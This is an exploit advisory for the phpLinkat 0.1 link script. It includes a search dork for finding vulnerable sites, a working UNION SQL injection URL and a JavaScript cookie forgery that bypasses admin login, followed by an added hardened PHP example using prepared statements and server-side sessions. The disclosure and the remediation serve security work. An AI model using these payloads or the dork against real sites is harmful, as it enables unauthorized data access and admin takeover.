phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability

2008.08.02
Risk: Medium
Local: No
Remote: Yes

################################ !R4Q!4N H4CK3R ###################################
#
# phpLinkat 0.1 Insecure Cookie Handling Vulnerability & SQL Injection Exploit
#
# Found by : Encrypt3d.M!nd
# encrypt3d.blogspot.com
#
# Dork : "Powered by DesClub.com - phpLinkat"
# Description : phpLinkat is a free link indexing script written in PHP that runs on MySQL. The script suffers from a SQL injection bug and insecure cookie handling.
#
# phpLinkat : SQL Injection Exploit

PoC : www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/*

# phpLinkat : Insecure Cookie Handling

/admin/login2.php:

    if( ($username == $cpusername) && ($password == $cppassword) ){
    setcookie("login","right"); // <<< wtf!!
    echo <<<EOF

Exploit:

javascript:document.cookie = "login=right; path=/;";

Then go to "phplinkat/admin/", and have fun ^_^

#End
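A hardened form of the two flaws described above, as an added example that is not phpLinkat's code or the advisory author's. The `links` table, its columns, all function names, and the assumption that the stored admin password is a `password_hash()` value are hypothetical.

```php
<?php
// Added example, not phpLinkat code. Table, column and function names are
// hypothetical; $cpHash is assumed to come from password_hash().
declare(strict_types=1);

// showcat.php side: accept catid only as a positive integer.
function parse_catid($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bind the validated id; it is never concatenated into the SQL text.
function fetch_links(PDO $db, int $catid): array
{
    $stmt = $db->prepare('SELECT id, title FROM links WHERE catid = :catid');
    $stmt->bindValue(':catid', $catid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// admin/login2.php side: keep login state in a server-side session.
function start_admin_session(): void
{
    session_set_cookie_params(['path' => '/', 'httponly' => true, 'samesite' => 'Strict']);
    session_start();
}

function login(string $user, string $pass, string $cpUser, string $cpHash): bool
{
    if (!hash_equals($cpUser, $user) || !password_verify($pass, $cpHash)) {
        return false;
    }
    session_regenerate_id(true);   // fresh session id after authentication
    $_SESSION['admin'] = true;     // the flag lives on the server, not in the cookie
    return true;
}

function is_admin(): bool
{
    // A client-supplied "login=right" cookie is ignored entirely.
    return ($_SESSION['admin'] ?? false) === true;
}

// Constructed inputs: the first has the shape of the catid value in the PoC.
if (PHP_SAPI === 'cli') {
    foreach (['666 union select 1', '12', '-3', ''] as $raw) {
        printf("%-22s => %s\n", var_export($raw, true), var_export(parse_catid($raw), true));
    }
}
```

Every admin page would call `start_admin_session()` and then check `is_admin()` before producing output, so the browser only ever holds an opaque session id.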

References:

http://xforce.iss.net/xforce/xfdb/44060
http://www.securityfocus.com/bid/30386
http://www.milw0rm.com/exploits/6140

